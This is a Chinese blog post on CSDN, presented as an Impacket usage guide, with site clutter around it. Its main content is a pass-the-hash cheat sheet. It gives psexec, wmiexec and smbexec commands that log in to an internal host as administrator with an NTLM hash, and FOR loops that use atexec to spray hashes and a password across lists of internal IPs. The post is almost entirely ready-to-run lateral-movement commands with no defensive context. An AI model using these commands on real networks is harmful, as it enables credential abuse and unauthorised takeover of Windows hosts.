Impacket官方使用指南

最新推荐文章于 2024-05-05 22:31:22 发布
最新推荐文章于 2024-05-05 22:31:22 发布
阅读量860 收藏
点赞数
分类专栏: hash传递 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/113666733
版权

不过不是完整的hash值,记得前面加冒号

+++++++++++++++++
后面不能跟命令
psexec.exe yq/administrator@192.168.100.12 -hashes 00000000000000000000000000000000:6ed6e04a0288d5175d84cc617a401285
或者
psexec.exe yq/administrator@192.168.100.12 -hashes :6ed6e04a0288d5175d84cc617a401285

在这里插入图片描述

后面可以跟命令
wmiexec -hashes 00000000000000000000000000000000:6ed6e04a0288d5175d84cc617a401285 administrator@192.168.100.12 “whoami”
或者
wmiexec -hashes :6ed6e04a0288d5175d84cc617a401285 administrator@192.168.100.12 “whoami”
在这里插入图片描述
后面不能跟命令
smbexec.exe -hashes 00000000000000000000000000000000:6ed6e04a0288d5175d84cc617a401285 administrator@192.168.100.12
在这里插入图片描述

hash喷洒攻击
内网机器遍历做hash传递验证,ips.txt内容为内网ip,每段一条
FOR /F %i in (ips.txt) do atexec.exe -hashes :6ed6e04a0288d5175d84cc617a401285 ./administrator@%i whoami
在这里插入图片描述

指定主机ntlm hash遍历验证,hashes.txt为已知ntlm hash内容,每段一条
FOR /F %i in (hashes.txt) do atexec.exe -hashes %i ./administrator@192.168.100.12 whoami

文件内部的hash格式应该为":nthash"或者"lmhash:nthash",如果只采用nthash切记加一个冒号":"

在这里插入图片描述

在这里插入图片描述

内网机器遍历做密码验证,passwords.txt为已知密码内容,每段一条
在这里插入图片描述
FOR /F %i in (ips.txt) do atexec.exe ./administrator:000000yy.@%i whoami

在这里插入图片描述

参考
http://www.manongjc.com/article/97872.html

樱浅沐冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
impacket, Impacket是用于处理网络协议的python 类的集合.zip
10-10
impacket, Impacket是用于处理网络协议的python 类的集合 什么是 ImpacketImpacket是用于处理网络协议的python 类的集合。 Impacket专注于为包提供底层编程访问,并针对某些协议实现( 。例如 NMB,SMB1-3和 ms dcerpc ) 协议本身。 包可以以从头开始
impacket-Impacket是个使用网络协议进行工作的工具集合-python
06-18
impacket-Impacket是个使用网络协议进行工作的工具集合 什么是ImpacketImpacket 是一组用于处理网络协议的 Python 类。 Impacket 专注于提供对数据包和某些协议(例如 NMB、SMB1-3 和 MS-DCEPC)的低级编程访问协议实现本身。 数据包可以从头开始构建,也可以从原始数据中解析出来,面向对象的 API 使处理深层协议变得简单。 该库提供了一组工具作为可以在该库的上下文中完成的操作的示例。 可以在以下位置找到对某些工具的描述: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket 具有哪些协议? 以太网,Linux“熟”捕获。 IP、TCP、UDP、ICMP、IGMP、ARP。 (IPv4 和 IPv6)NMB 和 SMB1/2/3(高级实现)。 DCE/RPC 版本 4 和 5,通过不同的传输:UDP(版本 4 专用)、TCP、SMB/TCP、SMB/NetBIO
YanceSpring-F-IM-master_java_impacket-master_
10-04
F-IM全名FindIM(发现IM)使用JAVA语言开发
impacket-master.zip
03-23
impacket-master.zip
Sulley 安装和使用
05-05
包含一个Sulley安装文档,文档中用到的libdasm impacket pcapy pydbg软件也包含在压缩包中,MinGw Winpacap python很好找就不打包了。Sulley安装方法网上有很多种,这种可以作为一个参考和尝试。
Impacket工具使用
qq_18811919的博客
02-22 2574
Impacket工具包使用
超详细Impacket官方使用指南
Javachichi的博客
01-30 2108
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。有关某些工具的说明,请访问:https://www.secureauth.com/labs/open-source-tools/impacket
smbexec的使用(c$共享)
谢公子的博客
02-02 4473
目录 smbexec Impacket中的smbexec.py smbexec可以通过文件共享在运程系统中执行命令。对方主机需要开启 c$ 共享。 smbexec 工具说明: test.exe:客户端主程序 execserver.exe:目标系统中的辅助程序 使用: 将execserver.exe上次到目标系统的C:\Windows\目录下,以解除UAC对命令执行的限制,命令如下:...
impacket-examples-windows-master.zip
06-14
impacket-examples-windowsimpacket(网络协议工具包)的 windows 版本
impacket-0.9.9.9
05-05
impacket-0.9.9.9,官方版本
impacketImpacket是用于网络协议的Python类的集合
02-05
什么是ImpacketImpacket是用于网络协议的Python类的集合。 Impacket专注于提供对数据包的低级编程访问,并且对于某些协议(例如SMB1-3和MSRPC),协议实现本身。 数据包可以从头开始构建,也可以从原始数据中进行解析,而面向对象的API使处理协议深层次结构变得简单。 该库提供了一组工具,作为在该库的上下文中可以完成的操作的示例。 可以在以下找到一些工具的说明: : 有哪些协议? 以太网,Linux“ Cooked”捕获。 IP,TCP,UDP,ICMP,IGMP,ARP。 IPv4和IPv6支持。 NMB和SMB1,SMB2和SMB3(高级实现)
Impacket:一组用于处理网络协议的Python类-开源
04-25
Impacket是旨在用于网络协议的Python类的集合。 创建它的主要目的是希望减轻与实施网络协议和堆栈相关的障碍,并旨在加快研究和教育活动。 它提供了对数据包的低级编程访问,以及某些协议(例如SMB1-3和MSRPC)的协议实现本身。 它具有多种协议,包括以太网,IP,TCP,UDP,ICMP,IGMP,ARP,NMB和SMB1,SMB2和SMB3等。 Impacket的面向对象的API使处理协议的深层次结构变得容易。 它可以从头开始构造数据包,也可以从原始数据中解析它们。
ntlm-scanner:一个基于Impacket的简单python工具,可以对服务器进行各种已知的NTLM漏洞测试
03-21
新的!针对CVE-2020-1472的漏洞利用扫描(ZeroLogon) 扫描网络中的DC以检测对CVE-2020-1472的实际利用 例子: python scan.py -vuln CVE-2020-1472 -target-file targets.txt python scan.py -vuln CVE-2020-1472 -target <DC> 该工具的工作原理是每分钟尝试为DC设置一个空密码。由于漏洞利用必须将密码设置为空,除非快速恢复密码,否则它将在漏洞利用期间运行时检测漏洞尝试。 NTLM扫描仪 检查SMB上的各种NTLM漏洞。该脚本将建立与目标主机的连接,并发送无效的NTLM身份验证。如果接受此设置,则主机容易受到所应用的NTLM漏洞的攻击,您可以执行相关的NTLM攻击。更多信息,请参见: 请注意,大多数扫描不会生成失败的登录尝试,因为登录信息本身是
C++:map和set类
最新发布
qq_66442539的博客
05-05 737
map和set
LEETCODE 707. 设计链表
weixin_38682909的博客
04-30 268
【代码】LEETCODE 707. 设计链表。
CST电磁仿真软件优化器和选择激励的使用【图文教程】
a18665053298的博客
04-28 663
局部优化算法适用于需要优化的变量数量少,Parameter取值范围小的优化,全局优化算法适用于需要优化的变量数量多,Parameter取值范围大的仿真优化,我们要根据实际情况选择最佳解决方案。在此对话框中勾选需要进行仿真的Port,也可以更改Port的Amplitude和Phase,还可以设置为依次激励还是同时激励。【TIP】设置simultaneous的状态下进行仿真时,因为不是依次计算各端口获取的传输特性,S-Parameter结果不会输出到Output,而是输出到F-Parameter。
批量抓取某电影网站的下载链接
知命不惧,日日自新。
05-04 1568
在这个Python项目中,开发者创建了一个名为`MovieScraper`的类,用于从网站抓取电影信息。这个类包含了一些方法,每个方法都负责完成一个特定的任务: - `get_response(url)`:向指定的URL发送GET请求并返回响应。 - `get_movie_list_html(response)`:从响应中提取电影列表的HTML。 - `get_sub_url_list(movie_list_html)`:从电影列表HTML中提取子URL。
猿人学第七题-动态字体-随风漂移
zhuangjoo的博客
04-30 409
最后有一点网页里名字的索引是从1开始的,所以point的最大值索引要+1才是名字的索引。通过这两步可以建立初始化的name与num列表。
impacket的使用
07-28
要开始使用Impacket,你需要先安装它。你可以通过pip命令来安装Impacket: ``` pip install impacket ``` 安装完成后,你可以在Python脚本中导入Impacket的模块,并使用其中的函数和类来实现你的需求。例如,如果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值